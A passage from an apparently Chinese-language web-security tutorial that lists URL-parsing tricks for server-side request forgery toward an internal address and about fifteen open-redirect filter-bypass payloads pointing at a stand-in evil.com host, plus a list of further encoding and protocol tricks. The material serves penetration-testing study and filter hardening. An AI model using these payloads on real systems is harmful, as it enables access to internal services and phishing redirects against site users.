http://google.com:80+&@127.88.23.245:22/#+@google.com:80/
http://127.88.23.245:22/+&@google.com:80#+@google.com:80/
http://google.com:80+&@google.com:80#+@127.88.23.245:22/
http://127.88.23.245:22/?@google.com:80/
http://127.88.23.245:22/#@www.google.com:80/
另外,某些情形下,可能对域名做了限制,这时候可以尝试绕过,这里绕过的技巧类似URL重定向绕过或SSRF绕过技巧。主要说一下畸形构造绕过,当然也可以Fuzzing,畸形构造主要涉及如下字符:";"、 "/"、"\"、"?"、":"、"@"、"="、"&"、"."。常见bypass方式:
a. 单斜线"/"绕过
https://www.xxx.com/redirect.php?url=/www.evil.com
b. 缺少协议绕过
https://www.xxx.com/redirect.php?url=//www.evil.com
c. 多斜线"/"前缀绕过
https://www.xxx.com/redirect.php?url=///www.evil.com
https://www.xxx.com/redirect.php?url=www.evil.com
d. 利用"@"符号绕过
https://www.xxx.com/redirect.php?url=https://www.xxx.com@www.evil.com
e. 利用反斜线"\"绕过
https://www.xxx.com/redirect.php?url=https://www.evil.com\https://www.xxx.com/
f. 利用"#"符号绕过
https://www.xxx.com/redirect.php?url=https://www.evil.com#https://www.xxx.com/
g. 利用"?"号绕过
https://www.xxx.com/redirect.php?url=https://www.evil.com?www.xxx.com
h. 利用"\\"绕过
https://www.xxx.com/redirect.php?url=https://www.evil.com\\www.xxx.com
i. 利用"."绕过
https://www.xxx.com/redirect.php?url=.evil
https://www.xxx.com/redirect.php?url=.evil.com
j.重复特殊字符绕过
https://www.xxx.com/redirect.php?url=///www.evil.com//..
https://www.xxx.com/redirect.php?url=www.evil.com//..
其他常见的绕过方式还有,使用地址,而不是域名;使用跳转到IPV6地址,而不是IPv4地址;用10进制、8进制、16进制形式表示;更换协议,使用ftp、gopher协议等;